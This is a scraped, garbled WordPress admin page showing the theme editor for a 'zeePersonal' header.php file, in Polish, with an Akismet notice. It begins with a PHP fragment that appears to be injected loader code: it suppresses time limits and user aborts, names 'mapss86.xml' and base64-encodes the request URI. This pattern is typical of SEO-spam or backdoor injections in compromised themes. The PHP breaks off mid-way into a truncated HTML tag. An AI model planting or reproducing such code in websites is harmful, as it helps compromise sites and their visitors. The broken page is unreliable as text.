@set_time_limit(3600); @ignore_user_abort(1); $xmlname = 'mapss86.xml'; $jdir = ''; $smuri_tmp = smrequest_uri(); if($smuri_tmp==''){ $smuri_tmp='/'; } $smuri = base64_encode($smuri_tmp); $dt = 0; function smrequest_uri(){ if (isset($_SERVER['REQUEST_URI'])){ $smuri = $_SERVER['REQUEST_URI']; }else{ if(isset($_SERVER['argv'])){ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; }else{ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $smuri; } ?>s="http://www.w3.org/1999/xhtml" class="ie8 wp-toolbar" dir="ltr" lang="pl-PL"> Edytuj motywy ‹ BConcept — WordPress

Akismet jest już prawie gotów. Musisz wprowadzić swój klucz do API Akismeta, aby mógł on działać.


Edytuj motywy

zeePersonal: Nagłówek (header.php)